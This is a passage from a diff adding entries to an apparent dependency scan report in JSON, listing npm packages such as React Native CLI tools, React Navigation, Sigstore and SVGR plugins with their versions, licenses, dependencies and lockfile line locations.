}, + "Version": "1.1.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4041, + "EndLine": 4046 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-clean@20.0.0", + "Name": "@react-native-community/cli-clean", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-clean@20.0.0", + "UID": "fc229ad29843bc22" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@20.0.0", + "chalk@4.1.2", + "execa@5.1.1", + "fast-glob@3.3.3" + ], + "Locations": [ + { + "StartLine": 4128, + "EndLine": 4140 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-config@20.0.0", + "Name": "@react-native-community/cli-config", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-config@20.0.0", + "UID": "ea8330afc360de16" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@20.0.0", + "chalk@4.1.2", + "cosmiconfig@9.0.0", + "deepmerge@4.3.1", + "fast-glob@3.3.3", + "joi@17.13.3" + ], + "Locations": [ + { + "StartLine": 4141, + "EndLine": 4155 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-config-android@18.0.0", + "Name": "@react-native-community/cli-config-android", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-config-android@18.0.0", + "UID": "76ba21b4da961914" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@18.0.0", + "chalk@4.1.2", + "fast-glob@3.3.3", + "fast-xml-parser@4.5.3" + ], + "Locations": [ + { + "StartLine": 17555, + "EndLine": 17566 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-config-android@20.0.0", + "Name": "@react-native-community/cli-config-android", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-config-android@20.0.0", + "UID": "48c6fab71b00f79" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@20.0.0", + "chalk@4.1.2", + "fast-glob@3.3.3", + "fast-xml-parser@4.5.3" + ], + "Locations": [ + { + "StartLine": 4156, + "EndLine": 4168 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-config-apple@18.0.0", + "Name": "@react-native-community/cli-config-apple", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-config-apple@18.0.0", + "UID": "bbe498e3a43c2382" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@18.0.0", + "chalk@4.1.2", + "execa@5.1.1", + "fast-glob@3.3.3" + ], + "Locations": [ + { + "StartLine": 17567, + "EndLine": 17578 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-config-apple@20.0.0", + "Name": "@react-native-community/cli-config-apple", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-config-apple@20.0.0", + "UID": "5b74474bd1d6ca1f" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@20.0.0", + "chalk@4.1.2", + "execa@5.1.1", + "fast-glob@3.3.3" + ], + "Locations": [ + { + "StartLine": 4169, + "EndLine": 4181 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-doctor@20.0.0", + "Name": "@react-native-community/cli-doctor", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-doctor@20.0.0", + "UID": "a0bb433bce6434fd" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-config@20.0.0", + "@react-native-community/cli-platform-android@20.0.0", + "@react-native-community/cli-platform-apple@20.0.0", + "@react-native-community/cli-platform-ios@20.0.0", + "@react-native-community/cli-tools@20.0.0", + "chalk@4.1.2", + "command-exists@1.2.9", + "deepmerge@4.3.1", + "envinfo@7.17.0", + "execa@5.1.1", + "node-stream-zip@1.15.0", + "ora@5.4.1", + "semver@7.7.3", + "wcwidth@1.0.1", + "yaml@2.8.1" + ], + "Locations": [ + { + "StartLine": 4182, + "EndLine": 4205 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-platform-apple@20.0.0", + "Name": "@react-native-community/cli-platform-apple", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-platform-apple@20.0.0", + "UID": "6a6f8f9f0f28b78b" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-config-apple@20.0.0", + "@react-native-community/cli-tools@20.0.0", + "chalk@4.1.2", + "execa@5.1.1", + "fast-xml-parser@4.5.3" + ], + "Locations": [ + { + "StartLine": 4233, + "EndLine": 4246 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-server-api@20.0.0", + "Name": "@react-native-community/cli-server-api", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-server-api@20.0.0", + "UID": "b75ec001c99a57ba" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli-tools@20.0.0", + "body-parser@1.20.3", + "compression@1.8.1", + "connect@3.7.0", + "errorhandler@1.5.1", + "nocache@3.0.4", + "open@6.4.0", + "pretty-format@29.7.0", + "serve-static@1.16.2", + "ws@6.2.3" + ], + "Locations": [ + { + "StartLine": 4257, + "EndLine": 4275 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-tools@18.0.0", + "Name": "@react-native-community/cli-tools", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-tools@18.0.0", + "UID": "7e39bfbbf9d4249" + }, + "Version": "18.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@vscode/sudo-prompt@9.3.1", + "appdirsjs@1.2.7", + "chalk@4.1.2", + "execa@5.1.1", + "find-up@5.0.0", + "launch-editor@2.11.1", + "mime@2.6.0", + "ora@5.4.1", + "prompts@2.4.2", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 17579, + "EndLine": 17596 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-tools@20.0.0", + "Name": "@react-native-community/cli-tools", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-tools@20.0.0", + "UID": "d9f05e660285a221" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@vscode/sudo-prompt@9.3.1", + "appdirsjs@1.2.7", + "chalk@4.1.2", + "execa@5.1.1", + "find-up@5.0.0", + "launch-editor@2.11.1", + "mime@2.6.0", + "ora@5.4.1", + "prompts@2.4.2", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 4276, + "EndLine": 4294 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/cli-types@20.0.0", + "Name": "@react-native-community/cli-types", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/cli-types@20.0.0", + "UID": "5da0d4a3eee4327b" + }, + "Version": "20.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "joi@17.13.3" + ], + "Locations": [ + { + "StartLine": 4321, + "EndLine": 4330 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native-community/push-notification-ios@1.12.0", + "Name": "@react-native-community/push-notification-ios", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/push-notification-ios@1.12.0", + "UID": "48b2ba7beb1d1339" + }, + "Version": "1.12.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "invariant@2.2.4", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 4387, + "EndLine": 4400 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/assets-registry@0.81.0", + "Name": "@react-native/assets-registry", + "Identifier": { + "PURL": "pkg:npm/%40react-native/assets-registry@0.81.0", + "UID": "801c26d868002eac" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4472, + "EndLine": 4480 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/babel-plugin-codegen@0.81.0", + "Name": "@react-native/babel-plugin-codegen", + "Identifier": { + "PURL": "pkg:npm/%40react-native/babel-plugin-codegen@0.81.0", + "UID": "69a421a8b5fcdce7" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/traverse@7.28.4", + "@react-native/codegen@0.81.0" + ], + "Locations": [ + { + "StartLine": 4481, + "EndLine": 4493 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/codegen@0.81.0", + "Name": "@react-native/codegen", + "Identifier": { + "PURL": "pkg:npm/%40react-native/codegen@0.81.0", + "UID": "d40280764c52b70e" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "glob@7.2.3", + "hermes-parser@0.29.1", + "invariant@2.2.4", + "nullthrows@1.1.1", + "yargs@17.7.2" + ], + "Locations": [ + { + "StartLine": 4553, + "EndLine": 4571 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/community-cli-plugin@0.81.0", + "Name": "@react-native/community-cli-plugin", + "Identifier": { + "PURL": "pkg:npm/%40react-native/community-cli-plugin@0.81.0", + "UID": "1ab2664a392f1170" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-native-community/cli@20.0.0", + "@react-native/dev-middleware@0.81.0", + "@react-native/metro-config@0.81.0", + "debug@4.4.3", + "invariant@2.2.4", + "metro-config@0.83.3", + "metro-core@0.83.3", + "metro@0.83.3", + "semver@7.7.3" + ], + "Locations": [ + { + "StartLine": 4572, + "EndLine": 4598 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/debugger-frontend@0.81.0", + "Name": "@react-native/debugger-frontend", + "Identifier": { + "PURL": "pkg:npm/%40react-native/debugger-frontend@0.81.0", + "UID": "2283b5db013487c9" + }, + "Version": "0.81.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4611, + "EndLine": 4619 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/dev-middleware@0.81.0", + "Name": "@react-native/dev-middleware", + "Identifier": { + "PURL": "pkg:npm/%40react-native/dev-middleware@0.81.0", + "UID": "6f0cab7ec37bc7dc" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/ttlcache@1.4.1", + "@react-native/debugger-frontend@0.81.0", + "chrome-launcher@0.15.2", + "chromium-edge-launcher@0.2.0", + "connect@3.7.0", + "debug@4.4.3", + "invariant@2.2.4", + "nullthrows@1.1.1", + "open@7.4.2", + "serve-static@1.16.2", + "ws@6.2.3" + ], + "Locations": [ + { + "StartLine": 4620, + "EndLine": 4641 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/gradle-plugin@0.81.0", + "Name": "@react-native/gradle-plugin", + "Identifier": { + "PURL": "pkg:npm/%40react-native/gradle-plugin@0.81.0", + "UID": "ea0f77417bc23a89" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4708, + "EndLine": 4716 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/js-polyfills@0.81.0", + "Name": "@react-native/js-polyfills", + "Identifier": { + "PURL": "pkg:npm/%40react-native/js-polyfills@0.81.0", + "UID": "249e6546db3ae89a" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4717, + "EndLine": 4725 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/metro-babel-transformer@0.81.0", + "Name": "@react-native/metro-babel-transformer", + "Identifier": { + "PURL": "pkg:npm/%40react-native/metro-babel-transformer@0.81.0", + "UID": "f729eaedbe6a35b2" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@react-native/babel-preset@0.81.0", + "hermes-parser@0.29.1", + "nullthrows@1.1.1" + ], + "Locations": [ + { + "StartLine": 4726, + "EndLine": 4743 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/normalize-colors@0.73.2", + "Name": "@react-native/normalize-colors", + "Identifier": { + "PURL": "pkg:npm/%40react-native/normalize-colors@0.73.2", + "UID": "e3ae03bc30fe50c0" + }, + "Version": "0.73.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 7878, + "EndLine": 7883 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/normalize-colors@0.81.0", + "Name": "@react-native/normalize-colors", + "Identifier": { + "PURL": "pkg:npm/%40react-native/normalize-colors@0.81.0", + "UID": "4b659ceb29412a41" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4778, + "EndLine": 4783 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-native/virtualized-lists@0.81.0", + "Name": "@react-native/virtualized-lists", + "Identifier": { + "PURL": "pkg:npm/%40react-native/virtualized-lists@0.81.0", + "UID": "ad8f6389fc23f62c" + }, + "Version": "0.81.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/react@19.2.2", + "invariant@2.2.4", + "nullthrows@1.1.1", + "react-native@0.81.0", + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 18672, + "EndLine": 18694 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-navigation/core@7.17.1", + "Name": "@react-navigation/core", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/core@7.17.1", + "UID": "59dc5cd0e1ee12d3" + }, + "Version": "7.17.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-navigation/routers@7.5.3", + "escape-string-regexp@4.0.0", + "fast-deep-equal@3.1.3", + "nanoid@3.3.11", + "query-string@7.1.3", + "react-is@19.2.4", + "react@19.1.0", + "use-latest-callback@0.2.5", + "use-sync-external-store@1.6.0" + ], + "Locations": [ + { + "StartLine": 4791, + "EndLine": 4809 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-navigation/elements@2.9.13", + "Name": "@react-navigation/elements", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/elements@2.9.13", + "UID": "75e07205a5663780" + }, + "Version": "2.9.13", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@react-navigation/native@7.2.1", + "color@4.2.3", + "react-native-safe-area-context@5.6.1", + "react-native@0.81.0", + "react@19.1.0", + "use-latest-callback@0.2.5", + "use-sync-external-store@1.6.0" + ], + "Locations": [ + { + "StartLine": 4837, + "EndLine": 4859 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@react-navigation/routers@7.5.3", + "Name": "@react-navigation/routers", + "Identifier": { + "PURL": "pkg:npm/%40react-navigation/routers@7.5.3", + "UID": "f070c00a341d51fe" + }, + "Version": "7.5.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "nanoid@3.3.11" + ], + "Locations": [ + { + "StartLine": 4895, + "EndLine": 4903 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sideway/address@4.1.5", + "Name": "@sideway/address", + "Identifier": { + "PURL": "pkg:npm/%40sideway/address@4.1.5", + "UID": "c00b18a5a623d424" + }, + "Version": "4.1.5", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@hapi/hoek@9.3.0" + ], + "Locations": [ + { + "StartLine": 4922, + "EndLine": 4931 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sideway/formula@3.0.1", + "Name": "@sideway/formula", + "Identifier": { + "PURL": "pkg:npm/%40sideway/formula@3.0.1", + "UID": "7e9d3596b4ffce18" + }, + "Version": "3.0.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4932, + "EndLine": 4938 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sideway/pinpoint@2.0.0", + "Name": "@sideway/pinpoint", + "Identifier": { + "PURL": "pkg:npm/%40sideway/pinpoint@2.0.0", + "UID": "747cb83ab19f3906" + }, + "Version": "2.0.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4939, + "EndLine": 4945 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sigstore/bundle@4.0.0", + "Name": "@sigstore/bundle", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/bundle@4.0.0", + "UID": "174a86bfc55a1b9" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/protobuf-specs@0.5.0" + ], + "Locations": [ + { + "StartLine": 13882, + "EndLine": 13894 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sigstore/core@3.0.0", + "Name": "@sigstore/core", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/core@3.0.0", + "UID": "ff1d30bf956703d3" + }, + "Version": "3.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13895, + "EndLine": 13902 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sigstore/protobuf-specs@0.5.0", + "Name": "@sigstore/protobuf-specs", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/protobuf-specs@0.5.0", + "UID": "49b420df56bd905f" + }, + "Version": "0.5.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13903, + "EndLine": 13912 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sigstore/sign@4.0.1", + "Name": "@sigstore/sign", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/sign@4.0.1", + "UID": "a57594d6c89bf13" + }, + "Version": "4.0.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/bundle@4.0.0", + "@sigstore/core@3.0.0", + "@sigstore/protobuf-specs@0.5.0", + "make-fetch-happen@15.0.2", + "proc-log@5.0.0", + "promise-retry@2.0.1" + ], + "Locations": [ + { + "StartLine": 13913, + "EndLine": 13928 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sigstore/tuf@4.0.0", + "Name": "@sigstore/tuf", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/tuf@4.0.0", + "UID": "6ca04e115d754463" + }, + "Version": "4.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/protobuf-specs@0.5.0", + "tuf-js@4.0.0" + ], + "Locations": [ + { + "StartLine": 13929, + "EndLine": 13940 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sigstore/verify@3.0.0", + "Name": "@sigstore/verify", + "Identifier": { + "PURL": "pkg:npm/%40sigstore/verify@3.0.0", + "UID": "32176d62ebaca59d" + }, + "Version": "3.0.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sigstore/bundle@4.0.0", + "@sigstore/core@3.0.0", + "@sigstore/protobuf-specs@0.5.0" + ], + "Locations": [ + { + "StartLine": 13941, + "EndLine": 13953 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sinclair/typebox@0.27.8", + "Name": "@sinclair/typebox", + "Identifier": { + "PURL": "pkg:npm/%40sinclair/typebox@0.27.8", + "UID": "f1a3e3ed0fccdea5" + }, + "Version": "0.27.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 4946, + "EndLine": 4951 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sinonjs/commons@3.0.1", + "Name": "@sinonjs/commons", + "Identifier": { + "PURL": "pkg:npm/%40sinonjs/commons@3.0.1", + "UID": "a2b98918e41a56cf" + }, + "Version": "3.0.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "type-detect@4.0.8" + ], + "Locations": [ + { + "StartLine": 4952, + "EndLine": 4960 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@sinonjs/fake-timers@10.3.0", + "Name": "@sinonjs/fake-timers", + "Identifier": { + "PURL": "pkg:npm/%40sinonjs/fake-timers@10.3.0", + "UID": "6da376b830351b66" + }, + "Version": "10.3.0", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@sinonjs/commons@3.0.1" + ], + "Locations": [ + { + "StartLine": 4961, + "EndLine": 4969 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-add-jsx-attribute@8.0.0", + "Name": "@svgr/babel-plugin-add-jsx-attribute", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-add-jsx-attribute@8.0.0", + "UID": "ffb4c5caf11b4944" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 4970, + "EndLine": 4985 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", + "Name": "@svgr/babel-plugin-remove-jsx-attribute", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-attribute@8.0.0", + "UID": "91970c4a5ff02e03" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 4986, + "EndLine": 5001 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", + "Name": "@svgr/babel-plugin-remove-jsx-empty-expression", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", + "UID": "3960bf1a11e63ab2" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 5002, + "EndLine": 5017 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", + "Name": "@svgr/babel-plugin-replace-jsx-attribute-value", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", + "UID": "8e93b46ecc545908" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 5018, + "EndLine": 5033 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-svg-dynamic-title@8.0.0", + "Name": "@svgr/babel-plugin-svg-dynamic-title", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-svg-dynamic-title@8.0.0", + "UID": "e9a0e0ca804bbf3f" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 5034, + "EndLine": 5049 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-svg-em-dimensions@8.0.0", + "Name": "@svgr/babel-plugin-svg-em-dimensions", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-svg-em-dimensions@8.0.0", + "UID": "6b6ab181cb54b434" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 5050, + "EndLine": 5065 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-transform-react-native-svg@8.1.0", + "Name": "@svgr/babel-plugin-transform-react-native-svg", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-transform-react-native-svg@8.1.0", + "UID": "53d4662eddfe92a7" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 5066, + "EndLine": 5081 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-plugin-transform-svg-component@8.0.0", + "Name": "@svgr/babel-plugin-transform-svg-component", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-plugin-transform-svg-component@8.0.0", + "UID": "e8457ee7b3ff63af" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4" + ], + "Locations": [ + { + "StartLine": 5082, + "EndLine": 5097 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/babel-preset@8.1.0", + "Name": "@svgr/babel-preset", + "Identifier": { + "PURL": "pkg:npm/%40svgr/babel-preset@8.1.0", + "UID": "b0762b57e7756629" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@svgr/babel-plugin-add-jsx-attribute@8.0.0", + "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", + "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", + "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", + "@svgr/babel-plugin-svg-dynamic-title@8.0.0", + "@svgr/babel-plugin-svg-em-dimensions@8.0.0", + "@svgr/babel-plugin-transform-react-native-svg@8.1.0", + "@svgr/babel-plugin-transform-svg-component@8.0.0" + ], + "Locations": [ + { + "StartLine": 5098, + "EndLine": 5123 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/core@8.1.0", + "Name": "@svgr/core", + "Identifier": { + "PURL": "pkg:npm/%40svgr/core@8.1.0", + "UID": "1f6bc883498762a4" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@svgr/babel-preset@8.1.0", + "camelcase@6.3.0", + "cosmiconfig@8.3.6", + "snake-case@3.0.4" + ], + "Locations": [ + { + "StartLine": 5124, + "EndLine": 5143 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/hast-util-to-babel-ast@8.0.0", + "Name": "@svgr/hast-util-to-babel-ast", + "Identifier": { + "PURL": "pkg:npm/%40svgr/hast-util-to-babel-ast@8.0.0", + "UID": "14cf997983a2ce8c" + }, + "Version": "8.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/types@7.28.4", + "entities@4.5.0" + ], + "Locations": [ + { + "StartLine": 5182, + "EndLine": 5198 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/plugin-jsx@8.1.0", + "Name": "@svgr/plugin-jsx", + "Identifier": { + "PURL": "pkg:npm/%40svgr/plugin-jsx@8.1.0", + "UID": "31f8e49d9476241d" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@svgr/babel-preset@8.1.0", + "@svgr/core@8.1.0", + "@svgr/hast-util-to-babel-ast@8.0.0", + "svg-parser@2.0.4" + ], + "Locations": [ + { + "StartLine": 5199, + "EndLine": 5220 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "@svgr/plugin-svgo@8.1.0", + "Name": "@svgr/plugin-svgo", + "Identifier": { + "PURL": "pkg:npm/%40svgr/plugin-svgo@8.1.0", + "UID": "2f5287ec4de14b78" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@svgr/core@8.1.0", + "cosmiconfig@8.3.6", + "deepmerge@4.3.1", + "svgo@3.3.2" + ], + "Locations": [ + { + "StartLine": 5221, + "EndLine": 5241 + } + ], + "AnalyzedBy": "npm" + }, 